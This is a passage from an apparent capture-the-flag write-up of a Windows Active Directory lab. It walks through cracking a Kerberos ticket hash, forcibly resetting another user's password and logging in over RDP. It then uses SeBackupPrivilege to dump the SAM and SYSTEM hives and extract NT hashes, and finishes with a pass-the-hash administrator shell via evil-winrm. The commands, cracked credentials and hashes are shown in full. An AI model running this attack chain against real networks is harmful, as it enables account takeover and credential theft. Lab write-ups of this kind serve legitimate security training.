john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
haze1988 (?)
1g 0:00:00:07 DONE (2024-10-19 14:39) 0.1381g/s 1058Kp/s 1058Kc/s 1058KC/s hazel564..hazamanaz
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that I have another new set of credential, time to check bloodhound again.
Since admins OU contains tier1, hazel.green might have permission to molly.smith user which including changing the user’s password.
1
net rpc password "Molly.Smith" "P@ssw0rd" -U "hokkaido-aerospace.com"/"hazel.green"%'haze1988' -S 192.168.135.40
Port 3389
Now that the password have been changed, time to check using netexec.
1
2
3
netexec rdp 192.168.135.40 -u molly.smith -p 'P@ssw0rd'
RDP 192.168.135.40 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:hokkaido-aerospace.com) (nla:True)
RDP 192.168.135.40 3389 DC [+] hokkaido-aerospace.com\molly.smith:P@ssw0rd (Pwn3d!)
With the Pwn3d! message, I could just perform remote desktop to the machine now.
1
xfreerdp /cert-ignore /u:molly.smith /p:P@ssw0rd /v:192.168.135.40
1
2
3
4
5
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Users\molly.smith>whoami
haero\molly.smith
Now that I have shell access but not administrator account, time to privilege escalation.
Privilege Escalation
I tried uploading winpeas to run but the machine has antivirus on and auto remove my winpeas. So I’ll just check manually and hope for a good result.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
C:\Users\Public>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Group used for deny only
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
After looking at my current user’s group, I think that I might be able to run the command shell as administrator since I have a group tier1-admins. After using my current credentials to run the command shell as administrator, I noticed that a new shell was spawn but I do not have administrator shell. Instead, I was given more permission.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
C:\Windows\system32>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSystemtimePrivilege Change the system time Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Now I have SeBackupPrivilege with the administrator shell. I could just dump SAM and SYSTEM from the machine and get hashes.
1
2
3
4
5
C:\Users\Public>reg save hklm\sam sam
The operation completed successfully.
C:\Users\Public>reg save hklm\system system
The operation completed successfully.
Now just transfer the file to host and get the hash.
1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Now that I have the hash, I could just access the machine using winrm.
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.135.40 -u Administrator -H d752482897d54e239376fddb2a2109e4
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
haero\administrator
With that, I got the administrator shell ~
Things I learned from this machine
- enumerate user using
kerbruteif there’s nothing else to do - password might be username
- get bloodhound information asap and understand it
GenericWriteto user = can get the user hash (my own understanding)- can change other user password if under own OU (I’m also not that sure)
- run cmd as administrator if under group that has the name admin or just try
SeBackupPrivilege= can get SAM and SYSTEM